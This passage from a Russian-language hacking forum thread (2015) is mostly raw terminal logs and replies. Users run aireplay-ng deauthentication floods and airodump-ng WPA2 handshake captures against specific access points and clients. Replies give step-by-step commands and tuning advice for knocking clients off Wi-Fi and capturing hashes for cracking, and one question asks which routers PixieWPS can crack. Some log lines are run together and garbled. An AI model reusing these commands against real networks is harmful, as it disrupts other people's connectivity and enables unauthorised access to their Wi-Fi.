19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:49:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:50:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 1
19:50:19 wlan1mon is on channel 1, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
19:51:12 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
19:51:22 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
19:51:28 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
19:51:38 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:52:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:24 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:52:31 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:39 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:44 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:52:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 2 ACKs]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:53:16 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:17 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:34 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:48 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:50 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:55 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:58 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:54:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
^C
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:54:19 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
19:54:29 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon19:54:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:54:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:55:30 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:55:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:56:07 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 5
19:56:08 wlan1mon is on channel 5, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:56:17 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:56:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:56:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 -c 6C:5F:1C:BE:E3:B7 wlan1
Interface wlan1:
ioctl(SIOCGIFINDEX) failed: No such device
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:56:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 10
19:56:51 wlan1mon is on channel 10, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:57:02 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
19:57:12 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon19:57:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 3
19:57:23 wlan1mon is on channel 3, but the AP uses channel 6
root@neo:~#
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:57:25 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 2
19:57:26 wlan1mon is on channel 2, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:57:28 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:57:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 -- ignore-negative-one
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng mon -a 84:C9:B2:CB:842 -0 10 -- ignore-negative-one
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:12:15 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:13:05 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:13:05 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:08 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:09 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:10 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:11 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:12 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:13:48 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:13:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:17:12 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:17:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:17:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:36 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:17:41 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:842 -0 10 --ignore-negative-one
20:26:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:26:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:26:58 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:00 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon20:27:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
20:27:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~#
root@neo:~#airmon-ng
root@neo:~#airmon-ng start wlan(x)
root@neo:~#ifconfig ....................-смотришь свой адапте в режиме монитора
root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) mon(x) ................................. -w - записывает хеш write, -с - канал
root@neo:~#новый терминал
root@neo:~#aireplay-ng -0 xxx -a xx:xx:xx:xx:xx mon(xxx) ........................-0 - и есть -- деавторизация --deauth, xxx - кол-во пакетов.
здесь показаны команы в линуксе, которая ддосит wifi
вот так
а как такое же сделать в windows ? командами без посторонних программ ?
а как это самое в windows сделать ?
snabgenech
06.11.2015, 00:29
root@neo:~#airmon-ng
root@neo:~#airmon-ng start wlan(x)
root@neo:~#ifconfig ....................-смотришь свой адапте в режиме монитора
root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) mon(x) ................................. -w - записывает хеш write, -с - канал
root@neo:~#новый терминал
root@neo:~#aireplay-ng -0 xxx -a xx:xx:xx:xx:xx mon(xxx) ........................-0 - и есть -- деавторизация --deauth, xxx - кол-во пакетов.
Установлено kali linux 2.0
где именно хеши сохраняются?
binarymaster
06.11.2015, 00:32
а как это самое в windows сделать ?
В Windows этого никак не сделать, пока что. Windows очень многое ограничивает, в плане аппаратного доступа.
erwerr2321
06.11.2015, 00:44
Установлено kali linux 2.0
где именно хеши сохраняются?
home folder
ну то по умолчанию, а так куда укажешь... и не хэши, а cap файлы!
qazzaq500
06.11.2015, 01:21
Нужен свисток для тарелки от параболы 90 см. Линк держал как можно дальше! Просьба самодельные и дорогие не предлагать! Нужны готовые решение, в али их много но которую???
snabgenech
06.11.2015, 09:26
Утро доброе форумчане!
Ранее уже писал что не могу поймать хейндшеки.
Установлен kali linux 2.0
Адаптер tp link 8200 nd
root@neo:~#airmon-ng
root@neo:~#iwconfig
root@neo:~#ifconfig wlan1 down
root@neo:~#iwconfig wlan1 mode monitor
root@neo:~#ifconfig wlan1 up
root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) wlan1
root@neo:~#новый терминал
root@neo:~#aireplay-ng -0 10 -a xx:xx:xx:xx:xx wlan1
Файл под названием сохраняется,но в окне WPA хендшейк не появляется.
Отключить клиента от точки также на получается, проверяю на своем роутере(подкл. телефон на андройде)
уже в тупике,заранее спасибо.
erwerr2321
06.11.2015, 10:34
Утро доброе форумчане!
Ранее уже писал что не могу поймать хейндшеки.
Установлен kali linux 2.0
Адаптер tp link 8200 nd
root@neo:~#airmon-ng
root@neo:~#iwconfig
root@neo:~#ifconfig wlan1 down
root@neo:~#iwconfig wlan1 mode monitor
root@neo:~#ifconfig wlan1 up
root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) wlan1
root@neo:~#новый терминал
root@neo:~#aireplay-ng -0 10 -a xx:xx:xx:xx:xx wlan1
Файл под названием сохраняется,но в окне WPA хендшейк не появляется.
Отключить клиента от точки также на получается, проверяю на своем роутере(подкл. телефон на андройде)
уже в тупике,заранее спасибо.
пробуй отправлять другое кол-во деаутентификационных пакетов
aireplay-ng -0 100 -a xx:xx:xx:xx:xx wlan1 - например 100, можно больше...
конкретизируй клиента сети
aireplay-ng -0 100 -a xx:xx:xx:xx:xx -с yy:yy:yy:yy:yy:yy wlan1
snabgenech
06.11.2015, 10:46
пробуй отправлять другое кол-во деаутентификационных пакетов
aireplay-ng -0 100 -a xx:xx:xx:xx:xx wlan1 - например 100, можно больше...
конкретизируй клиента сети
aireplay-ng -0 100 -a xx:xx:xx:xx:xx -с yy:yy:yy:yy:yy:yy wlan1
Пробывал и 100 не вырубаю и все.
Может не так что то делаю.
Сегодня попробую.
Спасибо
UNIXTREID
06.11.2015, 14:02
Если честно, мне кажется, что mdk3 будет поэффективнее и не требует много движений для простой деаутентификации
Black_Edition
07.11.2015, 14:09
Добрый день всем, мне нужна помощь, переехал в турцию, что бы учиться в вузе. Тек вот
шас в обшаге. Тут вайфай, скорость норм 60=70 мб/с. Хотел просто посмотреть что такое Black Desert Новая игра...Упс вижу приложение ГамеНет не видит сети. Тоесть как буд-то интернета нет.
Что делать. И да насчет ошибок, ноут куплен в турции а тут русской вкладки нет, приходиться по памяти
Панель называеться
Azora Captive Panel
Кто что знает?
_____________________________
Попа в том что интернет есть, но именно клинет не видит
Так же торент не видит сети
binarymaster
07.11.2015, 20:05
Попа в том что интернет есть, но именно клинет не видит
Так же торент не видит сети
Наверно сеть выходит через общий прокси сервер, поэтому другого интернета помимо HTTP нет.
Это не решается одним ответом, нужно исследовать сеть.
Black_Edition
07.11.2015, 21:43
ц
Наверно сеть выходит через общий прокси сервер, поэтому другого интернета помимо HTTP нет.
Это не решается одним ответом, нужно исследовать сеть.
И шо порекомендуете?
snabgenech
07.11.2015, 22:20
Что не так делаю,не могу откл. клиента от точки и поймать хендшейки.
[CODE]
root@neo:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Power Management:eek:ff
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
root@neo:~# airodump-ng wlan1mon
CH 2 ][ Elapsed: 12 s ][ 2015-11-07 20:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:CB:84:D2 -33 51 3 0 6 54e WPA2 CCMP PSK DSL_2
00:04:56:C9:29:16 -65 0 2 0 1 -1 WPA
Подскажите пожайлуста,скрипт
PixieWPS ломает вот такую точку:
TP-LINK TL-WR740N
binarymaster
08.11.2015, 00:23
Подскажите пожайлуста,скрипт
PixieWPS ломает вот такую точку:
TP-LINK TL-WR740N
Нет.
Нет.
так он на атеросе,не ломается атерос?
binarymaster
08.11.2015, 02:25
так он на атеросе,не ломается атерос?
Насчёт конкретно Atheros не могу с уверенностью сказать. Но эта модель не поддаётся.
Triton_Mgn
09.11.2015, 00:01
Что не так делаю,не могу откл. клиента от точки и поймать хендшейки.
root@neo:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff
Power Management:eek:ff
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:eek:ff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff
Encryption key:eek:ff
Power Management:eek:ff
lo no wireless extensions.
root@neo:~# airodump-ng wlan1mon
CH 2 ][ Elapsed: 12 s ][ 2015-11-07 20:48
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:CB:84:D2 -33 51 3 0 6 54e WPA2 CCMP PSK DSL_2
00:04:56:C9:29:16 -65 0 2 0 1 -1 WPA <leng
24:A4:3C:78:A5:38 -97 9 0 0 10 54e. WPA2 CCMP PSK zzz
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 -21 0e- 1 0 5
root@neo:~# airodump-ng -c 6 wlan1mon
CH 6 ][ Elapsed: 1 min ][ 2015-11-07 20:50
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
84:C9:B2:CB:84:D2 -45 22 201 51 0 6 54e WPA2 CCMP PSK D
E8:DE:27:9D:47:BC -97 0 5 0 0 6 54e. WPA2 CCMP PSK W
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 -9 0e- 1 2 65
root@neo:~# airodump-ng -w 100 --bssid 00:04:56:C9:29:16 -c1 wlan1
Interface wlan1:
ioctl(SIOCGIFINDEX) failed: No such device
root@neo:~# airodump-ng -w 100 --bssid 84:C9:B2:CB:84:D2 wlan1mon
CH 12 ][ Elapsed: 6 s ][ 2015-11-07 20:50
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:CB:84:D2 -39 25 0 0 6 54e WPA2 CCMP PSK DSL_2
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 -9 0 - 1 0 1
root@neo:~# airodump-ng -w 100 --bssid 84:C9:B2:CB:84:D2 -c6 wlan1mon
CH 6 ][ Elapsed: 4 mins ][ 2015-11-07 20:55
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
84:C9:B2:CB:84:D2 -6 100 1000 288 2 6 54e WPA2 CCMP PSK D
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 0 0e- 1e 15235 2694
root@neo:~# airodump-ng -w 100 --bssid 84:C9:B2:CB:84:D2 -c6 wlan1mon
CH 6 ][ Elapsed: 5 mins ][ 2015-11-07 21:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
84:C9:B2:CB:84:D2 -6 0 1187 17916 0 6 54e WPA2 CCMP PSK D
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 0 0e- 1e 186 23503
root@neo:~# airodump-ng -w 100 --bssid 84:C9:B2:CB:84:D2 -c6 wlan1mon
CH 6 ][ Elapsed: 2 mins ][ 2015-11-07 21:03
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
84:C9:B2:CB:84:D2 -16 10 430 93 0 6 54e WPA2 CCMP PSK D
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 0 0e- 1e 3878 2285
root@neo:~#
Термина 2
root@neo:~# aireplay-ng --deauth 100 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
20:53:12 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
20:53:12 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
20:53:13 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:53:13 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:53:14 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
20:53:14 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
